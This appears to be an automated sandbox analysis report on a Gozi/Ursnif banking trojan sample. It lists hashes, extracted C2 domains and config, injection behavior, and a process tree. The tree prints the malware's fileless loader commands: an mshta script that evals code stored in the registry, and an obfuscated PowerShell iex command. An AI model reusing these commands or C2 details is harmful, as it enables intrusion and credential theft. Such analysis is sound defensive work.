Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2023 08:57
Static task
static1
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20230831-en
General
-
Target
Client.exe
-
Size
422KB
-
MD5
c788f8e7a2d0311297bd198ca9d05ec8
-
SHA1
64240992ba99ae27b0bb4fe277a95524a4b139db
-
SHA256
bf237f642cd049be1e0be68de0f3bd6ed97be7d05059fb2825f94fd0a5afebfd
-
SHA512
2295c28aa11e3c1ea09f0ba790ea1e8322b3c996f4f27bf0aec9edf0997329ea8d13b98417e856f7bd922f4a0d9ef786117b8354a04b752d53e6b53733db4f5d
-
SSDEEP
6144:eH0vsBFRMXdX0tn7qnmUVR9g0pHii2B8mG+R2FLxgwExgw:eH0v4FRyX0tnWnN9pHiN4+R2NxEx
Malware Config
Extracted
gozi
Extracted
gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral2/memory/940-0-0x0000000001500000-0x000000000150C000-memory.dmp dave -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
Client.execontrol.exepowershell.exeExplorer.EXEdescription pid process target process PID 940 set thread context of 2832 940 Client.exe control.exe PID 2832 set thread context of 2564 2832 control.exe Explorer.EXE PID 1416 set thread context of 2564 1416 powershell.exe Explorer.EXE PID 2564 set thread context of 3784 2564 Explorer.EXE RuntimeBroker.exe PID 2832 set thread context of 4532 2832 control.exe rundll32.exe PID 2564 set thread context of 3156 2564 Explorer.EXE RuntimeBroker.exe PID 2564 set thread context of 4792 2564 Explorer.EXE RuntimeBroker.exe PID 2564 set thread context of 3500 2564 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Client.exepowershell.exeExplorer.EXEpid process 940 Client.exe 940 Client.exe 1416 powershell.exe 1416 powershell.exe 1416 powershell.exe 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2564 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
Client.execontrol.exepowershell.exeExplorer.EXEpid process 940 Client.exe 2832 control.exe 1416 powershell.exe 2564 Explorer.EXE 2832 control.exe 2564 Explorer.EXE 2564 Explorer.EXE 2564 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 1416 powershell.exe Token: SeShutdownPrivilege 2564 Explorer.EXE Token: SeCreatePagefilePrivilege 2564 Explorer.EXE Token: SeShutdownPrivilege 2564 Explorer.EXE Token: SeCreatePagefilePrivilege 2564 Explorer.EXE Token: SeShutdownPrivilege 2564 Explorer.EXE Token: SeCreatePagefilePrivilege 2564 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 2564 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 2564 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.exeClient.execsc.execontrol.exeExplorer.EXEdescription pid process target process PID 216 wrote to memory of 1416 216 mshta.exe powershell.exe PID 216 wrote to memory of 1416 216 mshta.exe powershell.exe PID 1416 wrote to memory of 1404 1416 powershell.exe csc.exe PID 1416 wrote to memory of 1404 1416 powershell.exe csc.exe PID 1404 wrote to memory of 4704 1404 csc.exe cvtres.exe PID 1404 wrote to memory of 4704 1404 csc.exe cvtres.exe PID 940 wrote to memory of 2832 940 Client.exe control.exe PID 940 wrote to memory of 2832 940 Client.exe control.exe PID 940 wrote to memory of 2832 940 Client.exe control.exe PID 1416 wrote to memory of 752 1416 powershell.exe csc.exe PID 1416 wrote to memory of 752 1416 powershell.exe csc.exe PID 752 wrote to memory of 3600 752 csc.exe cvtres.exe PID 752 wrote to memory of 3600 752 csc.exe cvtres.exe PID 940 wrote to memory of 2832 940 Client.exe control.exe PID 940 wrote to memory of 2832 940 Client.exe control.exe PID 2832 wrote to memory of 2564 2832 control.exe Explorer.EXE PID 2832 wrote to memory of 2564 2832 control.exe Explorer.EXE PID 2832 wrote to memory of 2564 2832 control.exe Explorer.EXE PID 2832 wrote to memory of 2564 2832 control.exe Explorer.EXE PID 1416 wrote to memory of 2564 1416 powershell.exe Explorer.EXE PID 1416 wrote to memory of 2564 1416 powershell.exe Explorer.EXE PID 2564 wrote to memory of 3784 2564 Explorer.EXE RuntimeBroker.exe PID 2564 wrote to memory of 3784 2564 Explorer.EXE RuntimeBroker.exe PID 1416 wrote to memory of 2564 1416 powershell.exe Explorer.EXE PID 2564 wrote to memory of 3784 2564 Explorer.EXE RuntimeBroker.exe PID 1416 wrote to memory of 2564 1416 powershell.exe Explorer.EXE PID 2832 wrote to memory of 4532 2832 control.exe rundll32.exe PID 2832 wrote to memory of 4532 2832 control.exe rundll32.exe PID 2832 wrote to memory of 4532 2832 control.exe rundll32.exe PID 2564 wrote to memory of 3784 2564 Explorer.EXE RuntimeBroker.exe PID 2564 wrote to memory of 3156 2564 Explorer.EXE RuntimeBroker.exe PID 2564 wrote to memory of 3156 2564 Explorer.EXE RuntimeBroker.exe PID 2832 wrote to memory of 4532 2832 control.exe rundll32.exe PID 2832 wrote to memory of 4532 2832 control.exe rundll32.exe PID 2564 wrote to memory of 3156 2564 Explorer.EXE RuntimeBroker.exe PID 2564 wrote to memory of 3156 2564 Explorer.EXE RuntimeBroker.exe PID 2564 wrote to memory of 4792 2564 Explorer.EXE RuntimeBroker.exe PID 2564 wrote to memory of 4792 2564 Explorer.EXE RuntimeBroker.exe PID 2564 wrote to memory of 4792 2564 Explorer.EXE RuntimeBroker.exe PID 2564 wrote to memory of 4792 2564 Explorer.EXE RuntimeBroker.exe PID 2564 wrote to memory of 3500 2564 Explorer.EXE cmd.exe PID 2564 wrote to memory of 3500 2564 Explorer.EXE cmd.exe PID 2564 wrote to memory of 3500 2564 Explorer.EXE cmd.exe PID 2564 wrote to memory of 3500 2564 Explorer.EXE cmd.exe PID 2564 wrote to memory of 3500 2564 Explorer.EXE cmd.exe PID 2564 wrote to memory of 3500 2564 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\control.exeC:\Windows\system32\control.exe -h3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h4⤵
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>L8kj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(L8kj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uxgtak -value gp; new-alias -name eybtmdmub -value iex; eybtmdmub ([System.Text.Encoding]::ASCII.GetString((uxgtak "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\20cwjbn4\20cwjbn4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32F2.tmp" "c:\Users\Admin\AppData\Local\Temp\20cwjbn4\CSC52B7EE14C994448EAF819F33A05BA9AB.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ks23o1vi\ks23o1vi.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES33CD.tmp" "c:\Users\Admin\AppData\Local\Temp\ks23o1vi\CSC7AE502D2B30548C58CA85FC1F09AB123.TMP"5⤵
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\20cwjbn4\20cwjbn4.dllFilesize
3KB
MD5e7d8d11adbc1e4301cf9a15fcb558b58
SHA1dff6a97f6aa45056985c613b6db3616cc03d8f02
SHA25630ffeb17ab954ec29b0fb9a046cba8f33071ec3a2a8662cca4cdc63bd95d6087
SHA5124da772f425488f37a5a86849a50d29c1d7029e226cea791c940b537e64bb0f4c6379461f516f66c889d42442ebbe53634ff853c78664ef9388bb5acf96274522
-
C:\Users\Admin\AppData\Local\Temp\RES32F2.tmpFilesize
1KB
MD51d8d8ea4f69cc28fc1de9161db517571
SHA13eace8d9c1df645a62bb87a53fffb91fd10842e0
SHA256e4ca880eee08db9598d0151a0d1d403852ca696c904542b9011c7773c2768d61
SHA512589298d9a308730a800de3e12ef33607adcb9976ace0b162a523a5e6eb5447b8b1ddeb3449a43819b5eef32f52316516537f320f4d8b3b93fbfc5d06e6aa1f1a
-
C:\Users\Admin\AppData\Local\Temp\RES33CD.tmpFilesize
1KB
MD58fe8a3b6187e5b418c8a9a34fb01e077
SHA14445c12b8f4710f3270a362303193edc174b8003
SHA25663825946dcd27fba6f18823da1820d268ccbefc3c9151c1b2e745c8e2019fbb7
SHA512417ea4feff836987db791d7fa96eb62cc6324c9ca23242796b3cdaeb48a9d99c2d6c96bdc330cf0f4c30420111a29e864cdcc31e73d4c02f63738734abbf28e6
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ppld2nup.anz.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\ks23o1vi\ks23o1vi.dllFilesize
3KB
MD574b77b655e02da4ab3fda121f0584033
SHA19c27ffb193ff50b543da0c05722c86c464d65b07
SHA256b76d80f773eb7ebff8fbb9a2b495b71c45701e2a8708ea5c5a69fb2a532e599d
SHA5125c28a9348cdb2736a30e75ffd18b94be05257221cb5d31138db2521c3b2209889674a63a8a720476402d9bf1838dcd6a0531f173fc77b60d64f6b5c9060a41ff
-
\??\c:\Users\Admin\AppData\Local\Temp\20cwjbn4\20cwjbn4.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\20cwjbn4\20cwjbn4.cmdlineFilesize
369B
MD540df7a4f648e5de9d461bd77222912df
SHA1a3705fa48e4cc624e3d3e889b4cb3974e2f972bb
SHA256e880a3f59082b40f9080fabf764e4093bf0a3559ed3d6815fa89005595ae3cfe
SHA512413012e9113fe1de720a630d8549c393f955b2c0596472ea3a26b9917297c3883fd1913b91a8a83b5b8c9198c6457e76dbf72885fc7c03bbefbb0bd6ea5ac33d
-
\??\c:\Users\Admin\AppData\Local\Temp\20cwjbn4\CSC52B7EE14C994448EAF819F33A05BA9AB.TMPFilesize
652B
MD53a945055bb70d573215ab16a063125df
SHA178ca3a22949c6597f1d29825c34de12df595f000
SHA25674abee4e18479a08bf4fe2e95ccfa582af52f0430cb6c629b88b42e74589588a
SHA512c7deea56fc6bab6dd930b9d47c1e07ef6ad0b266b4daa390ed52d0b8fd26085ad35e6f09488b9b67dcbc1fbb88ea948b8517f9de11a405666310d27f943fbc6d
-
\??\c:\Users\Admin\AppData\Local\Temp\ks23o1vi\CSC7AE502D2B30548C58CA85FC1F09AB123.TMPFilesize
652B
MD56d46b439e1f81a48b0d43494f5be675c
SHA12a2f902ca6a46c890f89f8fca02dd21a4fdd0016
SHA2567da6ce758e6e0aea8939953a0f95ad8150753a3eed467c54f58b554508d5d4ed
SHA512c9111f3b07453e7f222887246edabcce694f77066171a70c12d0fa94eaff9e18275463f74a0e0e9282bf6f1c7d40900f7405aa10ff5b185e5f03e63f5890f48c
-
\??\c:\Users\Admin\AppData\Local\Temp\ks23o1vi\ks23o1vi.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\ks23o1vi\ks23o1vi.cmdlineFilesize
369B
MD5a24fad2cdc22de2b7a732027971c4129
SHA1cec7937160a70ed7903f6b8cf668af15a586526d
SHA256f0515f65571b8da9e6a7f681872493f14f92653791a7103454d62a3f13864ed1
SHA5121e2fed98033b276d08516d88e390304c6578d0957fea694c91c8945ec0a5b76bae4871c22edd8033a797256371ea3678a0d0786dbe7acedb78d841e23d31f8fb
-
memory/940-0-0x0000000001500000-0x000000000150C000-memory.dmpFilesize
48KB
-
memory/940-11-0x0000000001540000-0x000000000154D000-memory.dmpFilesize
52KB
-
memory/940-5-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/940-1-0x0000000001510000-0x000000000151F000-memory.dmpFilesize
60KB
-
memory/1416-29-0x000001A359320000-0x000001A359330000-memory.dmpFilesize
64KB
-
memory/1416-41-0x000001A35AF30000-0x000001A35AF38000-memory.dmpFilesize
32KB
-
memory/1416-28-0x000001A359320000-0x000001A359330000-memory.dmpFilesize
64KB
-
memory/1416-30-0x000001A359320000-0x000001A359330000-memory.dmpFilesize
64KB
-
memory/1416-113-0x000001A3735B0000-0x000001A3735ED000-memory.dmpFilesize
244KB
-
memory/1416-114-0x00007FFB75D60000-0x00007FFB76821000-memory.dmpFilesize
10.8MB
-
memory/1416-80-0x000001A359320000-0x000001A359330000-memory.dmpFilesize
64KB
-
memory/1416-61-0x000001A3735A0000-0x000001A3735A8000-memory.dmpFilesize
32KB
-
memory/1416-27-0x00007FFB75D60000-0x00007FFB76821000-memory.dmpFilesize
10.8MB
-
memory/1416-63-0x000001A3735B0000-0x000001A3735ED000-memory.dmpFilesize
244KB
-
memory/1416-24-0x000001A35AD20000-0x000001A35AD42000-memory.dmpFilesize
136KB
-
memory/1416-91-0x000001A359320000-0x000001A359330000-memory.dmpFilesize
64KB
-
memory/1416-69-0x00007FFB75D60000-0x00007FFB76821000-memory.dmpFilesize
10.8MB
-
memory/1416-84-0x000001A359320000-0x000001A359330000-memory.dmpFilesize
64KB
-
memory/2564-66-0x0000000002E20000-0x0000000002E21000-memory.dmpFilesize
4KB
-
memory/2564-65-0x0000000008170000-0x0000000008214000-memory.dmpFilesize
656KB
-
memory/2564-77-0x00000000093A0000-0x0000000009444000-memory.dmpFilesize
656KB
-
memory/2564-119-0x00000000093A0000-0x0000000009444000-memory.dmpFilesize
656KB
-
memory/2564-118-0x0000000008170000-0x0000000008214000-memory.dmpFilesize
656KB
-
memory/2832-53-0x0000000000B80000-0x0000000000C24000-memory.dmpFilesize
656KB
-
memory/2832-54-0x0000000000C30000-0x0000000000C31000-memory.dmpFilesize
4KB
-
memory/2832-103-0x0000000000B80000-0x0000000000C24000-memory.dmpFilesize
656KB
-
memory/3156-121-0x00000253EF200000-0x00000253EF2A4000-memory.dmpFilesize
656KB
-
memory/3156-97-0x00000253EF1C0000-0x00000253EF1C1000-memory.dmpFilesize
4KB
-
memory/3156-92-0x00000253EF200000-0x00000253EF2A4000-memory.dmpFilesize
656KB
-
memory/3500-117-0x00000000009B0000-0x0000000000A48000-memory.dmpFilesize
608KB
-
memory/3500-111-0x00000000009B0000-0x0000000000A48000-memory.dmpFilesize
608KB
-
memory/3500-112-0x0000000000650000-0x0000000000651000-memory.dmpFilesize
4KB
-
memory/3784-86-0x00000240A96D0000-0x00000240A96D1000-memory.dmpFilesize
4KB
-
memory/3784-78-0x00000240A9C00000-0x00000240A9CA4000-memory.dmpFilesize
656KB
-
memory/3784-120-0x00000240A9C00000-0x00000240A9CA4000-memory.dmpFilesize
656KB
-
memory/4532-110-0x0000020CBAE70000-0x0000020CBAF14000-memory.dmpFilesize
656KB
-
memory/4532-94-0x0000020CBAD40000-0x0000020CBAD41000-memory.dmpFilesize
4KB
-
memory/4532-87-0x0000020CBAE70000-0x0000020CBAF14000-memory.dmpFilesize
656KB
-
memory/4792-106-0x0000018ECB5C0000-0x0000018ECB5C1000-memory.dmpFilesize
4KB
-
memory/4792-102-0x0000018ECBD20000-0x0000018ECBDC4000-memory.dmpFilesize
656KB
-
memory/4792-122-0x0000018ECBD20000-0x0000018ECBDC4000-memory.dmpFilesize
656KB